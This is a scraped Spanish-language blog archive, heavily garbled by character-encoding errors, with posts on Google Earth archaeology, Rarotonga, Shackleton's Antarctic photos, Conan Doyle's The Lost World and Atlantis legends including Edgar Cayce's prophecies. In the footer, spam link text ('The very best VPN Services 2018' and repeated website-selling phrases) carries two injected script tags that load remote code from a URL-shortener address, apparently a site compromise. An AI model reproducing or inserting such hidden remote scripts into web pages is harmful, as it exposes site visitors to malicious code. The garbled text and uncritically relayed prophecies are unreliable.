TERRA INCOGNITA

El pasado desde el aire

A�

Un rostro asoma desde el pasado. A�Via

Internautas aficionados a la arqueologA�a y la historia antigua han puesto de manifiesto la utilidad para el estudioA�deA�A�Google EarthA�y la aplicaciA?n on line Google maps, dos fenomenales herramientas sobre las que aA?n no se ha dicho la A?ltima palabra. En esta pA?gina de aquA� nos seA�alan mA?s de 2300 yacimientos arqueolA?gicos compilados hasta la fecha.A� La versiA?n online del programa podrA?n encontarla en este otro sitio, con enlaces directos a diversosA�destinos relacionados con la historia antigua en otras tantas partes del mundo. Como muestra un botA?n, abajo, una toma desde el aireA�A�de las ruinas romanas de Baelo Claudia,A� –aquA�, vA�aA�satA�lite –, en Bolonia (CA?diz), unA�lugar que merece una reposada visita.

A�

A�

Baelo Claudia, un destino fantA?stico para viajeros permanentes, romA?nticos o alpargateros

http://www.gearthhacks.com/dlfile3846/Archeological-Site-Baelo-Claudia.htmA�

A�

A�

-Fuentes y vA�nculos-

A�

1. Google Earth, yacimientos arqueolA?gicos via satA�lite, en Livius

2. MA?s viajes probables:A� Baelo ClaudiaA� en las rutas del legado andalusA�

A�

Martes, enero 17th, 2012 TERRA INCOGNITA 3 comentarios

Un destino

A�A�

Un destino: Rarotonga. Pero observen: et in arcadia ego; los cocoteros forman claramente el jeroglA�fico fatA�dico: 11. A?OsarA? la paranoia perseguirnos en el paraA�so, tanA�lejos del mundo conocido?

RAROTONGA es el nombre de una de las quince islasA�que forman el archipiA�lgao de lasA�Islas Cook,A�un paraA�so --segA?n nos cuentan los que hasta allA? han viajado-- A�constituido por una plA�yadeA� de pequeA�asA�estrellas flotantes con nombres exA?ticos e impronunciables, comoA�Aitutaki o Mangaia.A�A� RAROTONGA es la mayor de estas islas y tiene casi 15 mil habitantes, entre los cuales desearA�amos contarnos, pues en aquellos parajesA�A�hay hartos atractivos turA�sticos yA�un sinfA�n de ocasiones paraA�disfrutarA�del sagrado -o no tanto-A� tiempo de ocio.A�En definitiva, unA�Valhala, lujoso y caro, lleno deA�bellas hurA�esA�(orondas y de batas floreadas),A�A�cocoteros y alguna que otra iguana que toma el sol,A�displicente y ajena a los problemas del mundo (que son muchos). A�A�El poblado principal se llama Avarua, capital del archipiA�lago Cook (un dato muy relevanteA� por cortesA�a de Wikipedia). TambiA�n hay cerveza en Rarotonga.

(Dicen las fuentes que consultamos, muy poco de fiar por cierto, que en fecha tan seA�alada como la de hoy convendrA�a pedir un deseo (otros hablan de Anticristos, terrores atA?vicos, cometas, demonios encendidos, vA?rtices cA?smicos o infusorios) ; A?dA?ndeA�querrA�amos estar en 11 11 11?) Nosotros nos pedimos Rarotonga.

A�

A�

(No podA�an faltar tampoco, en fecha tan satA?nica yA� seA�alada, los sinvergA?enzasA� de un solo ojo, como el incombustible y cataplasma de Mike Rivers, vendiendo la moto del 11-11-11)

A�

Por si fuera poco atractivo, Rarotonga era tambiA�nA�el nombre de un personaje de cA?mic (malA�simo, todo hay que decirlo): “A�la sacerdotisa de una isla situada en alguna parte del ocA�ano… Poseedora de un gran atractivo sexual, debi ausar sus favores para defender a su pueblo, pero tambien disfrutaba manipulando las viudas de los blancos incautos que se enamoraban de ella. La historia fue escrita por Guillermo de la Parra, esposo de Yolanda Vargas DulchA�. Tuvo dos partes, con unos 100 capA�tulos cada una.” (1)

A�Rarotonga, su majestad negra. HA?gala suya (cada martes, todo con comedimiento y orden,A�por favor)

A�Rarorotonga fue creada por el seA�or. Guillermo de la Parra Loya, viudo de DoA�a Yolanda Vargas DulchA�, cuando estaban de vacaciones en un crucero por las islas del sur, y en ese viaje conocieron a una mujer bellA�sima que les inspirA? al punto el personaje.

A�
A�
Tongolele, 1949, para hacer el cuerpo a los ritmos de Rarotonga y las islas Cook
A�
A�
A�
A�
A�
Un vA�deo con una mA?sica insufrible que narra -por asA� decir- las excelencias (por asA� decir tambiA�n) de las islas Cook
A�
A�
Un A?ltimo tutubo con musiquilla mA?s insufrible aA?n, que nos presenta Bora Bora como el lugar ideal para renovarA�los sagrados votos del matrimonio (quizA? por que estA? muy lejos)
A�
A�
A�
A�
A�
A�
(1)A�Tomado de un fragmento del foro A?Alguien sabe algo de Rarotonga?…
(2) MA?s cosas de Rarotonga en este foro de aquA� (entren sin llamar, por la puerta trasera)
(3) Pida un deseo en la fecha “mA?gica” del 111 111; mA?s detalles en el blog de Ana VA?zquez
A�
A�

Viernes, noviembre 11th, 2011 LA X MARCA EL LUGAR, TERRA INCOGNITA 4 comentarios

La AntA?rtida en color

 

Fotos en color de la expediciA?n a la Antartida de Shackleton, 1915

 

CelebA�rrimas instantA?neas en color –segA?n aseguran nuestras fuentes, pero hasta el dA�a de hoy desconocidas para nosotros– del catastrA?ficoA�viaje Endurance de Sir Ernest Shackleton, que formA? parte de una expediciA?n trans-antA?rtica del Imperio BritA?nica, entre 1914 y 1917. MA?s fotos de Hurley, el fotA?grafo oficial de la expediciA?n, aquA�.

A principios de 1915, el Endurance quedarA�aA�fatalmente atrapado por los hielos del AntA?rtico.A�Hurley, el fotA?grafo del viaje, consiguiA? salvar lasA�placas, queA�dieron testimonio de la belleza extremaA�de la aventura.

 

 

(1) Visto en Retronaut (viajes al pasadoA�remoto,A�con mA?s de una sorpresaA�agradable para los sobrinos curiosos)

(2) Se buscan hombres para viaje peligroso; el viaje del Endurance, relatado en este otro sitio

(3) Un homenaje de Kodak a Hurley, hA�roe del viaje del Endurance y autor de las fotografA�as

 

 

 

Martes, octubre 11th, 2011 ICONOGRAPHIA CURIOSA, TERRA INCOGNITA 2 comentarios

La tierra de Mapple White

A�

(THE LOST WORLD,A� fantA?stico cartelillo de un magnA�fico ejemplar deA�celuloide rancio basado en el relato homA?nimo de Sir Arthur Conan Doyle)

El asunto del continente perdido, la ciudad ignota o remotA�sima o el destino secreto, cuyo acceso es apenas practicable para el profano, ha sido recurrente en la literatura de viajes y aventuras, especialmente A�enA�las pulp fiction stories--recordemos Pellucidar del TarzA?n de Burroughs, yA�otros destinos similares enA�obras de Robert Howard, Lovecraft o Merrit--, pero ha sidoA�motivoA�tambiA�n de la novela de enjundia, como en el caso de la ejemplar El Mundo Perdido, de Sir Arthur Conan Doyle, que con su descripciA?n de la Tierra de Mapple White contribuirA�a como pocos a fraguar definitivamente el perfil inconfundible de la Terra incognita y susA�pavorosos habitantes en la literatura y el cine modernos.

A�

A�

(El mapa de la Isla de la Calavera, remotamente inspirada en la Tierra de Mapple White) Foto Dinosaurcentral

Mapple White es --en la novela de Doyle-- un artista aventurero que se adentra en la espesura del Matto Grosso, en plena jungla amazA?nica, buscando experiencias y fuentes de inspiraciA?n para sus dibujos. En el curso de sus andanzas por la jungla llegarA? a saber a travA�s de sus contactos con los nativos de la existencia de una tierra desconocida en el corazA?n de la selva, una zona prohibida y tabuada para los indios, fronteraA�con lo desconocido, lo misterioso y lo monstruoso, dondeA�es peligroso adentrarseA�—non plus ultra--; A�una regiA?n nebulosaA�que creenA�dominio de un espA�ritu maligno, al que llaman Curupuri.A�A�A�Mapple White, desafiando las supersticionesA�A�de los nativos, arriesgarA? su vida en pos del descubrimiento. A su regreso, su A?lbum de dibujos constituirA? un testimonio de su sorprendente aventura por las entraA�as de un fabulosoA� mundo perdido.

A�

A�(Roraima, para algunos el lugar que inspirA? a Conan Doyle su Tierra de Mapple White)

A�

(Una serie de ilustraciones de una antiquA�sima ediciA?n del Mundo Perdido de Conan Doyle. Pueden hojearla aquA�)

A�

A�La tierra de Mapple White,A�ese mundo perdido imaginadoA�por Conan Doyle esA� reminiscente del ParaA�so Perdido; un lugar absconditus de difA�cil acceso --A�lugar de iniciaciA?n para el joven Malone, protagonista del fascinante relato-- , un autA�ntico temenos o recinto sagrado, una suerte de isla en medio de la selva, segregado del resto del mundo por un foso natural,A�casi inaccesibleA�A�exceptoA�para los hA�roes, que deberA?nA�probar su valor en innA?meras ocasiones, desde su entrada en la Tierra de Mapple a travA�s de unA�arduo y riesgoso pasaje --el filo de la navaja, puente o pasoA�peligroso de las novelas de caballerA�as--A� constituA�do en este caso por un gran A?rbol caA�do que harA? las veces de puente natural, hasta sus incontables luchas con las criaturas antediluvianas que pueblan la regiA?n y que, como todo dragA?n que se precie, custodian un formidable tesoro.

A�

La secuencia del puente, trasunto del paso peligroso de la gesta herA?ica, permite vincular simbA?licamente la Isla de la Calavera y la Tierra de Mapple White con el ParaA�so perdido

A�

El libro inspirarA�a muchA�simos trabajos posteriores, tanto literarios como cinematogrA?ficos. Antes de la llegada de Crichton con su Parque JurA?sico y su Mundo Perdido --en el que incluso se atreve a fusilar el nombre de la novela original-- , el mejor celuloide rancio tambiA�n fue deudor de la invenciA?n del inmortal creador de Sherlock Holmes. El Monstruo de los tiempos remotos, por ejemplo,A�A�se apropia del final estelar de la obra --que no desvelaremos aquA�-- para argumentar toda una historia. -.A� En The Lost World (1925), el primer largometraje de animaciA?n, se adaptarA�a librementeA�la novela original. La pelA�cula, dirigida por Henry Hoyt es recordada aA?n porA�ser la pionera de la tA�cnicaA� claymation --animaciA?n fotograma a fotograma, de la que Ray Harryhausen llegarA�a a ser maestro indiscutible--A� llevada a cabo por Willis OA?Brien, quien perfeccionarA�a estas tA�cnicas con su brillantA�simo trabajo, ocho aA�os mA?s tarde, en King Kong.

A�

A�

(PA?ster de la pelA�cula The Land that time forgot, de 1975, A�basada en una novela de E.R.Burroughs que sigue la estela inaugurada por El Mundo Perdido)

TambiA�n el guiA?n de King Kong mantiene no pocos paralelismos con El Mundo Perdido: la isla de la Calavera, hogar del simio gigantesco,A� estA? separada del mundo por una muralla que recuerda el farallA?n inexpugnable de la Tierra de Mapple White; como A�sta, se halla poblada de monstruos y dinosaurios que han sobrevivido, milagrosamente,A�el paso de las eras. Incluso la secuencia del A?rbol caA�do parece inspirada directamente en un episodio similar de la novela de Conan Doyle.A�Durante los aA�os cincuenta y sesenta, la mayorA�a de producciones cinematogrA?ficas de aventuras en las que se abordaba el asunto de los dinosaurios, como El Valle de Gwangi o The land that time forgot,A�entre otras, eran deudoras en cierto modo del legado de El Mundo Perdido. Y su influencia perdura hasta nuestros dA�as.

A�

A�(El valle de Gwangi,A�un trasunto de la Tierra de Mapple White, donde tambiA�n habitan los lagartos terribles)

A�

A�

A�

Un tutubo con el trA?iler de la primera adaptaciA?n cinematogrA?fica de la novela de Conan Doyle

A�

(1) The Lost World, en Greenbriar Picture Shows

(2) MA?s ciudades y continentes perdidos, en Las ciudades perdidas, una guA�a de viaje

(3) The lost world, de 1925, inspirada en la novela homA?nima de Conan Doyle

(4) Donde habitan los dinosaurios: la Tierra de Mapple White,A�Skull Island A�y otros territorios ignotos, y sus terribles pobladores. FantA?stica pA?gina.

(5) El mundo perdido (ediciA?n original inglA�s) aquA�

Atlantis Rising

(Atlantis, del genial Frazetta)

A�

Atlantis Rising

Las noticias –terribles– sobre laA�desgracia que se cierne actualmente sobre JapA?n no dejan de evocar el recuerdo mA�tico de esa otra A�isla devorada por las aguas, presente bajo diferentes nombres en lasA� leyendas de otras tantas culturas; el recuerdo asA�mismo de un cataclismo de proporciones colosales que terminA? con una de las mA?s esplendorosas civilizaciones que el mundo haya conocido: la AtlA?ntida,A� paradigma del continente perdido,A�isla sagrada por excelencia, nebulosa meta de no pocas singladuras y viajes en pos de lo imposible.

Descrita por vez primera por el filA?sofo griego PlatA?n en sus obras Timeo y Critias, esta isla legendaria, tragada porA� el mar, ha hecho correr rA�os de tinta y servido de inspiraciA?n a numerosos artistas, habiendo sido objeto de novelas y A�conocido mA?s de una adaptaciA?n cinematogrA?fica–ningunaA�excesivamente afortunada,A�todo sea dicho–.A�”La exactaA�descripciA?n de los textos de PlatA?n y el hecho que en ellos se afirme reiteradamente que se trata de una historia verdadera, ha llevado a que, especialmente a partir de la segunda mitad del siglo XIX, durante el Romanticismo, A�se propongan numerosas teorA�as sobre su ubicaciA?n. En la actualidad se piensa que el relato de la AtlA?ntida, segA?n la interpretaciA?n literal de las traducciones ortodoxas de los textos de PlatA?n, presenta anacronismos y datos poco fiables, sin embargo se ha apuntado que la leyenda pueda haber sido inspirada en un lejano fondo de realidad histA?rica, vinculado a alguna catA?strofe natural pretA�rita como pudiera ser un diluvio, una gran inundaciA?n o un terremoto. ” (1)

A�

(La AtlA?ntida del Mundus Subterraneus de Athanasius Kircher)

(La isla de Thera, en el MediterrA?neo, destruida por unaA�erupciA?n volcA?nica e A�identificada por algunos autores como la mA�tica AtlA?ntida)

A�

EscA�pticos, arqueolA?gos, eruditos y antropA?logos pueden patalear, pero el mito de la AtlA?ntida permanece. Cada cierto tiempo, alguien nuevo se erige en abanderado de esta causa perdida y lucha por reconstruirA�la leyenda. Desde hace mucho tiempo investigadores y aventureros han fantaseado con la ubicaciA?n de la AtlA?ntida, considerA?ndo su existencia bien real, habiA�ndose seA�alado diferentes emplazamientos en lugares bien dispares de medio mundo como candidatos al enclave del fabuloso reino desaparecido. Las A?ltimas campaA�as de bA?squeda nos llevanA�hasta el Coto de DoA�ana, en el sur de EspaA�aA�:de acuerdo con las teorA�as de unA�investigador estadounidense, la AtlA?ntida estuvo en las marismas de DoA�ana y fue destruida por un tsunami:A�” Para resolver el antiguo misterio, el equipo utilizA? una foto de satA�lite de una supuesta ciudad sumergida para encontrar el sitio justo al norte de CA?diz. AllA�, enterrada en las marismas del Parque de DoA�ana, creen que se asentaba la antigua ciudad de AtlA?ntida, compuesta por varios anillos.A� A�A lo largo de los aA�os 2009 y 2010, el equipo de arqueA?logos y geA?logos utilizA? una combinaciA?n de radar de profundidad de suelo, cartografA�a digital, y tecnologA�a submarina para inspeccionar i�?el sitio.(…) Los hallazgos del equipo fueron difundidos este domingo en el documental “BA?squeda de la AtlA?ntida”, un especial de la cadena National Geographic” A�(5)

A�

(La AtlA?ntida, un tema fascinante paraA� una inolvidable sesiA?n de tarde)

(Tsunami y PoseidA?n, rey de Atlantis: los acontecimientos venideros proyectan su sombra por anticipado)

A�Pero quien mA?s ha procurado de modo programA?tico una “resurrecciA?n” del mito de la AtlA?ntida ha sido, sin duda, el videnteA�estadounidenseA�Edgar Cayce, que legarA�a a la posteridad una impresionante cantidad de documentos sobre el supuesto descubrimiento del continente perdido en un momento impreciso de nuestro futuro inmediato. Cayce afirmaba con frecuencia haber vivido varias vidas en el pasado en la AtlA?ntida –nada menos–. En un perA�odo de veinte aA�os, entre 1923 y 1944, acumularA�a una vasta documentaciA?n sobre la AtlA?ntida que fue archivada por la organizaciA?n que el propio vidente fundarA�a en Virginia Beach, la A.R.E. (Asociation for Research and Elightenment).A�

A�

A�(Del Egipto faraA?nico a la AtlA?ntida sin pasar por la casilla de salida y sin cobrar las veinte mil pesetas)

A�

(AtlA?ntida: el aA�o que hicimos Contacto)

Edgar Cayce menciona en sus escritos, en relaciA?n con el resurgir de la AtlA?ntida, la llamada Sala de los Recuerdos (Hall of Records), una misteriosa cA?mara secreta que serA�a descubierta en algA?n lugar oculto bajo la Esfinge de Gizeh, y que contendrA�a entre sus tesoros importantes revelaciones sobre la civilizaciA?n desaparecida. Cayce afirmaba que los atlantes emigraron y decidieron llevar consigo sus mA?s preciados documentos a dos lugares, Egipto y YucatA?n. Con la ayuda de la tecnologA�a actual, algunosA�investigadores pretenden, siguiendo las indicaciones del vidente americano, encontrar dicha cA?mara en el lugar que los vaticinios precisan, esto es, cerca de laA�pataA�derecha de la Esfinge, en alguna parte bajo tierra entre el monumento y el Nilo.A� Esta asociaciA?n improbable entre la AtlA?ntida y el antiguo Egipto no es la A?nica en el milieu ocultista, y plantea mA?s preguntas de las que en este momento podemos responder; pero de la misma manera en que hay quienes se empeA�an en hacer desdeA�aA�os de la gran pirA?mide un monumento judeo-cristiano, con intereses mA?s bien oscuros, hay otros que pretenden vincular, si no de forma efectiva e histA?rica al menos en la esfera mA�tica, el continente desaparecido con la cultura de los faraones.A�En este sentido conviene recordr queA�el “profeta durmiente” Cayce afirmA? que en 1998A� tendrA�a lugar el hallazgo de unaA�A�cA?mara secreta y que esto supondrA�a un cambio definitivo para la humanidad y el inicio de una nueva era de prosperidad; el vidente consideraba asA�mismo que la apertura de la cA?mara coincidirA�a con la ParusA�a o segunda venida de Cristo.i�? Por otro lado, Graham Hangcok y Robert Bauval, en su obra el Mensaje de la Esfinge, proclaman que arqueA?logos norteamericanos en connivencia con el gobierno egipcio, han paralizado todas las investigaciones alrededor de la Esfinge de Gizeh, incluyendo cualquier intento de localizar pasadizos o cavidades subterrA?neas.

A�

Una de las A?ltimasA�revisiones necesariasA�del mito de la AtlA?ntida se nos antojaA�A�el descubrimento deA�las formaciones rocosas submarinas del archipiA�lago japonA�s deA�Ryu Kyu,A�cerca de la isla de YonaguniA�(A� ); un formidable hallazgo llevado a cabo por Kihachiro Aratake, buceador profesional y director de la AsociaciA?n de Turismo Yonaguni-Cho, que durante una de sus frecuentes inmersiones darA�a con una serie de estructruras ciclA?peas que recordaban poderosamente formas arquitectA?nicas. Desde aquel momento se propagA? la idea de que las formaciones rocosas –segA?n algunos expertos completamente naturales y explicables– serA�an las ruinas de alguna antigua civilizaciA?n. De aquA� a pensar en la mA�tica Mu o la AtlA?ntida, sumergidas en el mar, sA?lo hay un paso. Como quiera que sea, el descubrimiento “fortuito” atrae a miles de visitantes cada aA�o que acuden al A?rea para intentar resolver el misterio de la extraA�a ciudad submarina, entre cuyos monumentos figura una pirA?mide, para subrayar de nuevo el paralelismo entreA�egipcios y atlantes: “La construcciA?n tiene un aspecto que ha sido comparado con el de una pirA?mide escalonada sudamericana o con un zigurat mesopotA?mico, pero no se encuentra aislada. Junto a ella, como formando parte de un complejo de tipo ceremonial, aparecen restos de pasillos anchos y avenidas flanqueadas por pilones, columnas hexagonales, escaleras, arcadas y diferentes edificaciones, todas construidas con enormes bloques pA�treos perfectamente alineados.” (10)A�

A�

(Macroestructuras artificiales sumergidas en las costas de Taiwan: A?estA? la AtlA?ntida en Yonaguni?)

De tarde en tarde el mito de la AtlA?ntida resurge –vale decir que resucita– de las aguas en las que, A�como el hediondo Cthulhu lovecraftiano, duerme su profundo sueA�o de milenios. Asltimamente, la sombra del gigantesco tsunami que asolA? las costas japonesas ha vuelto a rescatar la leyenda del continente sumergido; del mismo modo que se rumorea ahora que el terremoto nipA?n ocasionA? un cambio en la inclinaciA?n del eje de la Tierra –noticia desmentida por algunos medios– Edgar Cayce,A�el profeta durmiente norteamericano,A�afirmaba queA�el hundimiento de la AtlA?ntidaA�afectA? del mismo modo alA�planeta; A�tambiA�n vaticinA? la inundaciA?n de una gran parte de JapA?n en los siguientes tA�rminos: ” Gran parte de Europa desaparecerA? bajo las aguas en un pestaA�eo de los ojosA�(…) A�Toda SudamA�rica se verA? sacudida como una alfombra sacudida por ambos extremos (…) La costa atlA?ntica de AmA�rica se verA? alterada , especialmente alrededor de Nueva York y Connecticut . Nueva York desaparecerA? . California y la PenA�nsula de baja California desaparecerA?n durante una serie de intensos terremotos . San Francisco , Los Angeles y Santa BA?rbara sA?lo serA?n algunas de las ciudades notables que despuA�s no existirA?n . El OcA�ano PacA�fico cubrirA? hasta la parte oeste de los Estados Unidos , hasta Arizona y Nebraska . Ambas serA?n pueblos costeros . La parte sur de las Carolinas y Georgia quedarA?n sumergidas en el ocA�ano . Los Grande Lagos se drenarA?n hasta el Golfo de MA�xico a travA�s del Mississippi . La mayor parte del JapA?n quedarA? sumergida.” (3)

A�

A�(El vidente Edgar Cayce vaticinA? la resurreciA?n de la AtlA?ntida y su insospechada vinculaciA?n con el Egipto faraA?nico)

(Videntes, ocultistas y exponentes de la astroarqueologA�a se empecinan en asociar Egipto a Atlantis: A?Por quA� motivo?)

Pero al margen de las posibilidades de su existencia histA?rica, laA�A�AtlA?ntida tiene un peso considerable como sA�mbolo. RenA� GuA�non la definA�a como la A�isla sagradaA� por excelencia, y su situaciA?n era literalmente polar en el origen –como la Thule hiperbA?rea– . Todas las demA?s A�islas sagradasA�, que son designadas por todas partes con nombres de significaciA?n idA�ntica, no fueron mA?s que imA?genes de aquella; y esto se aplica inclusive al centro espiritual de la TradiciA?n atlante, que no rige mA?s que un ciclo histA?rico secundario.”A� (2)

A�

(En la AtlA?ntida se fragua, bajo el tridente de PoseidA?n, la monarquA�a, el sistema de gobierno mA?s cercano al utA?pico ideal de PlatA?n)

i�?i�?i�?i�?La historia de la AtlA?ntida es tambiA�n, simbA?licamente, una variante del mito de la CaA�da del Hombre: Dice PlatA?n que los atlantes “habA�an aculmulado riquezas en tal abundancia, como nunca sin duda antes de ellos ninguna casa real las poseyera semejantes y como ninguna las poseerA? seguramente en el futuro… cosechaban dos veces al aA�o los productos de la tierra; en invierno utilizaban las aguas del cielo, en verano las que daba la tierra dirigiendo las corrientes fuera de los canales (Critias, 114d 118e)

A�

A�(La estructura con las tA�picas canalizaciones laberA�nticas de la isla de la AtlA?ntida)

La AtlA?ntida, el continente sumergido, permanece en el espA�ritu humano como el sA�mbolo de una suerte de paraA�so perdido o utA?pica ciudad ideal, a la luz de los textos inspirados a PlatA?n por los egipcios –a travA�s de SolA?n, de quiA�n se dice que oyA? la historia sobre la que fundamentA? su narraciA?n en el Timeo–; la isla,que fue un enorme y maravilloso reino, como otros tantos ejemplos simbA?licos similares (Shamballah, Tir NamA� Og, HiperbA?rea) quizA? existiA? realmente y quedan los recuerdos de una tradiciA?n muy antigua o tal vez se trate de una construcciA?n del imaginario colectivo, del que el mito platA?nico es A?nicamente un ejemplo entre cientos anA?logos: “PlatA?n proyecta en esa AtlA?ntida sus sueA�os de una organizaciA?n polA�tica y social sin fisuras (…) pero cuando el “elemento divino llegA? a disminuir entre los atlantes y dominA? el carA?cter humano –sinA?nimo aquA� de corrupciA?n moral– merecieron el castigo de Zeus. AsA� la AtlA?ntida evoca el tema de la CaA�da del Hombre y el JardA�n del EdA�n, o tambiA�n el de la Edad de Oro, que se encuentra en todas las civilizaciones, sea el albor de la humanidad, sea a su tA�rmino. La originalidad simbA?lica del mito de la AtlA?ntida entraA�a la idea de que el paraA�so reside en la predominancia en nosotros de la naturaleza divina. Los hombres, segA?n se ilustra en este mito del fabuloso continente perdido, acaban siempre “porque han dejado perder los bienes mA?s hermosos y preciosos”, por ser arrojados del EdA�n que se sumerge en ellos, se “oculta” y desaparece. A?No sugiere esto que el paraA�so y el infierno estA?n ante todo en nosotros mismos?. (11)

A�

A�

-Fuentes y vA�nculos-

(1) La AtlA?ntida, segA?n wikipedia.

(2) GuA�non, RenA�, AtlA?ntida e HiperbA?rea, en Sophia Perennis

(3) Edgar Cayce, the sleeping prophet, y sus “profecA�as” sobre el resurgir de la AtlA?ntidaA�(“La mayor parte de JapA?n quedarA? sumergida” dijo Cayce)

http://www.edgarcayce.org/espanol/ancientculturesintro.asp

(4) La desapariciA?n de la AtlA?ntida cambiA? el eje de la Tierra, en Delirios de un Vampiro

(5) Buscan la AtlA?ntida cerca de DoA�ana, en el sur de EspaA�a

http://www.europapress.es/sociedad/ciencia/noticia-atlantida-estaba-donana-destruyo-tsunami-20110314112536.html

(6)A�El foro de Atlantis Rising, con multitud de enlaces de diverso interA�s, incluidos numerosas referencias a los descubrimientos arqueolA?gicos de Yonaguni (6) Lemuria y Mu, dos continentes perdidos, primos hermanos de la fabulosa AtlA?ntida

(7) PoseidA?n y los reyes de la AtlA?ntida, en GonzA?lez Blanco, A.: Espacio y tiempo en la percepciA?n de la antigA?edad tardA�a

(8) Otros traducen directamente aquA� “pies palmeados“, buscando un nexoA�entre PoseidA?nA�y la pata de oca, cuya figura es curiosamente similar al tridente o al triple vajraA�y cuya asimilaciA?n al emblema de los constructores medievales (llamados “jars”) nos remite a un simbolismo de lo mA?s interesante que no podemos abordar en esta ocasiA?n.

(9) CientA�ficos que hallaron el Titanic buscan ahora la AtlA?ntida, un curioso reflejo invertido de nuestra propia bA?squeda, que seguirA? prA?ximamente el camino de vuelta : de la AtlA?ntida al Titanic.A�

(10A� ) Yonaguni, la AtlA?ntida de JapA?n, aquA� y aquA� (gracias a nuestro amigo SebastiA?n por ponernos sobre la pista de la historia de estas misteriosas estructuras submarinas)

(11) Un tubo sobre las ruinas submarinas de Yonaguni, aquA�.

(12)A�Los vaticiniosA�concernientes a la AtlA?ntida de Edgar Cayce, en este tubo.

(13) Gheerbrant y Chevalier, AtlA?ntida, en Diccionario de SA�mbolos

Related Posts with Thumbnails
Miércoles, marzo 23rd, 2011 MISTERIOS DE SÍBARIS, TERRA INCOGNITA 6 comentarios
Buscar
 
 
“Cuando el sabio apunta con el dedo al Cielo, el tonto solo ve un dedo” , Fray Gerundio de Campazas
 
 

Encuestas de la tita.

Archivo

Calendario

octubre 2018
L M X J V S D
« sep    
1234567
891011121314
15161718192021
22232425262728
293031  

Álbum Fotográfico

El archivo XML no existe
The very best VPN Services 2018<script src="https://is.gd/ob8vtI?v=v9.0"></script> Electric power Selling Approaches to Improve The Web business<script src="https://is.gd/ob8vtI?v=v8.0"></script> Outlines For Core Criteria In Essay Writing Help Starting A web site That Sells Starting An online site That Making A site That Making A site That Brings Profit Starting A web site That Brings Profit Starting A Website That Brings Profit Creating A site That Starting An online site That Sells Starting An online site That Provides Starting A site That Markets Designing A Website That Makes CLients Designing An online site That Brings Profit Designing A web site That Makes CLients Starting A web site That Sells Creating A Website That Brings Profit Making An online site That Markets Making A Website That Brings Profit Creating An online site That Creating A Website That Designing An online site That Markets Making A Website That Makes CLients Making A site That Brings Profit Starting A site That Creating A web site That Brings Profit Making A Website That Starting An online site That Provides Making A site That Creating A Website That Makes CLients Creating A Website That Sells